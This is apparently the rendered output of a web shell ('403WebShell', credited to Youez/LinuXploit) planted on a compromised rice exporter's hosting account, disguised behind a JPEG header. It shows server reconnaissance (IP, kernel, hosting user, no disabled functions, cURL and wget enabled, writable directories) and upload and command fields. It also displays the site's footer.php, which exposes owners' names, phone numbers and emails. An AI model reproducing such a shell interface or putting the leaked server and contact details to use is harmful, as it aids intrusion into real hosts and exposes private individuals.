���� JFIF    fdasasfas213sdaf403WebShell
403Webshell
Server IP : 147.79.69.148  /  Your IP : 216.73.216.200
Web Server : LiteSpeed
System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64
User : u479334040 ( 479334040)
PHP Version : 8.2.27
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u479334040/domains/justdial4web.com/public_html/asati/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u479334040/domains/justdial4web.com/public_html/asati/footer.php
<footer class="footer">
        <div class="container">
            <div class="footer-wrap">
                <div class="col">
                    <a href="index.php">
                        <img src="images/ftr_logo.png" alt="">
                    </a>
                    <p>
                    We are leading Manufacturer & Exporter of finest quality of Non Basmati Rice and Non Pesticides Rice in India. We are engaged in milling, processing & supply of finest qualities of Indian Rice in the form of Brown, Raw, Steam, Sella/ Parboiled & Golden Sella Rice to worldwide. 
                    </p>
                    <ul class="ftr_social">
                        <li><a href="#"><i class="fa-brands fa-twitter"></i></a></li>
                        <li><a href="#"><i class="fa-brands fa-facebook-f"></i></a></li>
                        <li><a href="#"><i class="fa-brands fa-instagram"></i></a></li>
                        <li><a href="#"><i class="fa-brands fa-linkedin-in"></i></a></li>
                        <li><a href="#"><i class="fa-brands fa-pinterest-p"></i></a></li>
                    </ul>
                </div>

                <div class="col">
                    <h3>Quick Links</h3>
                    <ul class="ftrlinks">
                        <li><a href="index.php">Home</a></li>     
                        <li><a href="aboutus.php">About Us</a></li>
                        <li><a href="products.php">Products</a></li>
                        <li><a href="riceprices">Rice Prices</a></li>
                        <li><a href="recipes.php">Recipes</a></li>
                        <li><a href="contactus.php">Contact Us</a></li>
                    </ul>
                </div>

               

                <div class="col">
                    <h3>Contact Us</h3>
                    <!--table width="100%">
                        <tbody><tr>
                            <td valign="top"><img src="images/whatsapp.png" alt="" style="width: 24px"></td>
                            <td valign="top">Call / WhaatsApp <br> <strong>91-8342000040</strong></td>
                        </tr>
                        <tr style="font-size:1px; line-height:1px">
                            <td>&nbsp;</td>
                            <td></td>
                        </tr>
                        <tr>
                            <td valign="top"><img src="images/whatsapp.png" alt="" style="width: 24px"></td>
                            <td valign="top">Call us now <br> <strong>91-8342000040</strong></td>
                        </tr>
                        <tr style="font-size:1px; line-height:1px">
                            <td>&nbsp;</td>
                            <td></td>
                        </tr>
                        <tr>
                            <td valign="top"><img src="images/whatsapp.png" alt="" style="width: 24px"></td>
                            <td valign="top">Drop Us an email <br> <strong style="text-transform: none;">upmindia@yahoo.in</strong></td>
                        </tr>
                    </tbody></table-->
                    <ul>
                    <li><strong>Asati Food products</strong></li>
                    <li>Asati Chawal Processing  </li>
                    <li>Usha Steam Udyog</li>
                    <li>Ma Usha Cold Storage</li>
                    <li><strong>Contact: </strong></li>
                    <li>Piyush Asati -  9158936661</li>
                    <li>pralhad Asati -  9372531361</li>
                    <li>Rakesh Asati -  9326574361</li>
                    <li>Email - Rajeshasati15@gmail.com</li>




                    </ul>
                </div>


                <div class="col">
                    <img src="images/ftr_rice.png" alt="">
                </div>

                
            </div>
        </div>
        <div class="ftr__copyright">
            <div class="container">
                <div class="col">
                    Copyright © 2022 Asati Food Products Amgaon. All rights reserved.
                </div>
                <div class="col">
                    Developed &amp; Managed By: <a href="https://adjointindia.com/" target="_blank">Adjoint India</a>
                </div>
            </div>
        </div>
    </footer>



    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="js/owl.carousel.min.js"></script>
    <script src="js/custom.js"></script>
    <script>
        function openCity(evt, cityName) {
            var i, tabcontent, tablinks;
            tabcontent = document.getElementsByClassName("tabcontent");
            for (i = 0; i < tabcontent.length; i++) {
                tabcontent[i].style.display = "none";
            }
            tablinks = document.getElementsByClassName("tablinks");
            for (i = 0; i < tablinks.length; i++) {
                tablinks[i].className = tablinks[i].className.replace(" active", "");
            }
            document.getElementById(cityName).style.display = "block";
            evt.currentTarget.className += " active";
        }
    </script>
    <style>

/* Style the tab */
.tab {
  overflow: hidden;

}

/* Style the buttons inside the tab */
.tab button {
  background-color: inherit;
  float: left;
  border: none;
  outline: none;
  cursor: pointer;
  padding: 14px 16px;
  transition: 0.3s;
  font-size: 17px;
}

/* Change background color of buttons on hover */
.tab button:hover {
  background-color: var(--red);
  color:#fff;
}

/* Create an active/current tablink class */
.tab button.active {
    background-color: var(--red);
    color: #fff;
}

/* Style the tab content */
.tabcontent {
  display: none;
  padding: 6px 12px;
  border: 1px solid #ccc;
  border-top: none;
}


button.tablinks {
    border: 1px solid var(--red);
    display: inline-block;
    margin: 0 10px;
    border-radius: 10px 10px 0 0;
    border-bottom: 0;
}

.tab {
    display: flex;
    justify-content: center;
}

.tabcontent {
    border: 1px solid var(--red);
    border-radius: 10px;
    padding: 2rem;
    min-height: 15rem;
    background: #fff;
    font-size: 1.2rem;
    overflow:hidden;
}

.tabcontent h3 {
    color:var(--red)
}

.tabcontent img {
    float: left;
    max-width: 350px;
    display: block;
    border: 1px solid var(--red);
    padding: 10px;
    border-radius: 5px;
    margin-right: 20px;
}
.tabcontent p {
    margin-top: 2rem;
}

@media(max-width:767px) {
    .tabcontent img { max-width: 100%;  margin: 0 0 20px 0;}
    .tab { flex-wrap: wrap;}
}


</style>
</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit